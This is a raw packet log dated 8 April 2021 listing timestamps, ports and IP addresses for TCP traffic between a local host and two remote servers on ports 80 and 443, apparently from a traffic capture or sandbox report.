Apr 8, 2021 12:50:33.144999981 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145023108 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145025969 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145041943 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145066977 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145123005 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145140886 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145175934 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145193100 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145226955 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145232916 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145272017 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145275116 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145311117 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145339012 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145349026 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145353079 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145361900 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145395994 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145397902 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145399094 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145437956 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145505905 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145545006 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145603895 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145627975 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145638943 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145664930 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145693064 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145724058 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145725965 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145745993 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145756006 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145780087 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145797968 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145832062 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145836115 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145859003 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145868063 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145886898 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145895958 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145910025 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145922899 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145944118 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145946026 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.145967960 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.145977974 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146006107 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146054029 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146087885 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146095991 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146117926 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146127939 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146141052 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146155119 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146173000 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146182060 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146197081 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146209002 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146233082 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146234035 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146256924 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146267891 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146294117 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146302938 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146334887 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146337986 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146358013 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146368027 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146382093 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146394968 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146418095 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146467924 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146491051 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146502972 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146512985 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146544933 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146550894 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146559954 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146584034 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146596909 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146605968 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146631956 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146645069 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146648884 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146665096 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146670103 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146694899 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146697998 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146734953 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146821976 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146858931 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146862030 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146882057 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146894932 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146904945 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146925926 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.146935940 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146940947 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146965981 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.146992922 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147023916 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147027969 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147047997 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147058010 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147083998 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147092104 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147126913 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147128105 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147172928 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147175074 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147201061 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147209883 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147227049 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147238016 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147260904 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147264004 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147299051 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147316933 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147324085 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147341013 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147383928 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147402048 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147423029 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147442102 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147485018 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147505999 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147536039 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147540092 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147558928 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147572994 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147582054 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147603989 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147624969 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147665977 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147676945 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147691965 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147748947 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147768021 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147877932 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147918940 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147918940 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147947073 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147954941 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147978067 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.147978067 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.147994995 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148000956 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148020983 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148027897 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148046017 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148072004 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148092031 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148119926 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148138046 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148143053 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148163080 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148169041 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148189068 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148194075 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148212910 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148216963 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148237944 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148269892 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148288012 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148293972 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148312092 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148372889 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148391008 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148459911 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148477077 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148503065 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148521900 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148577929 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148597956 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148610115 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148627996 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148633003 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148652077 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148657084 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148677111 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148690939 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148710012 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148716927 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148736000 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148751020 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148772001 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148776054 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148797035 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.148864985 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.148883104 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.149455070 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.149472952 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.149477959 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.149499893 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.149590969 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.149609089 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.149663925 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.149684906 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.149708033 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.149727106 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.149741888 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.149760008 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.149801016 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.149817944 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.149863005 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.149879932 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.149985075 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150002956 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150029898 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150047064 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150110006 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150129080 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150141001 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150158882 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150181055 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150198936 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150223970 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150242090 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150252104 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150273085 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150274038 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150295019 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150305986 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150325060 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150330067 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150351048 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150352955 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150373936 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150459051 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150475979 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150491953 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150510073 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150516987 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150536060 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150540113 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150561094 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150561094 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150580883 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150634050 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150654078 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150664091 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150681973 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150728941 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150746107 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150752068 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150773048 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150787115 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150806904 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150839090 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150856972 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150862932 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150878906 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150885105 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150906086 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150923014 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150942087 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150953054 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150970936 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.150979042 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.150998116 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151026011 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151042938 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151094913 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151114941 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151139021 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151156902 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151184082 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151201963 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151269913 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151289940 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151300907 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151319981 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151324987 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151344061 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151359081 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151377916 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151382923 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151402950 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151407003 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151426077 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151467085 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151492119 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151501894 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151546001 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151578903 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151580095 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151612997 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151612997 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151648045 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151648045 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151673079 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151681900 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151709080 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151757956 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151781082 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151804924 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151824951 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151840925 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151864052 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151906967 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151940107 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.151942015 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151973963 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.151981115 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.152018070 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.152023077 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.152050972 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.152070999 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.152086973 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.152086973 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.152110100 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.152127981 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.152134895 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.152153015 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.152159929 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.152170897 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.152180910 CEST	80	49167	198.23.174.104	192.168.2.22
Apr 8, 2021 12:50:33.152204037 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.152261972 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:50:33.740473032 CEST	49167	80	192.168.2.22	198.23.174.104
Apr 8, 2021 12:52:09.438158035 CEST	49168	443	192.168.2.22	149.154.167.220
Apr 8, 2021 12:52:09.479450941 CEST	443	49168	149.154.167.220	192.168.2.22
Apr 8, 2021 12:52:09.479557991 CEST	49168	443	192.168.2.22	149.154.167.220
Apr 8, 2021 12:52:09.491760015 CEST	49168	443	192.168.2.22	149.154.167.220
Apr 8, 2021 12:52:09.532953024 CEST	443	49168	149.154.167.220	192.168.2.22
Apr 8, 2021 12:52:09.537863970 CEST	443	49168	149.154.167.220	192.168.2.22
Apr 8, 2021 12:52:09.537897110 CEST	443	49168	149.154.167.220	192.168.2.22
Apr 8, 2021 12:52:09.537919044 CEST	443	49168	149.154.167.220	192.168.2.22
Apr 8, 2021 12:52:09.537938118 CEST	443	49168	149.154.167.220	192.168.2.22
Apr 8, 2021 12:52:09.537988901 CEST	49168	443	192.168.2.22	149.154.167.220
Apr 8, 2021 12:52:09.538008928 CEST	49168	443	192.168.2.22	149.154.167.220
Apr 8, 2021 12:52:09.545206070 CEST	443	49168	149.154.167.220	192.168.2.22
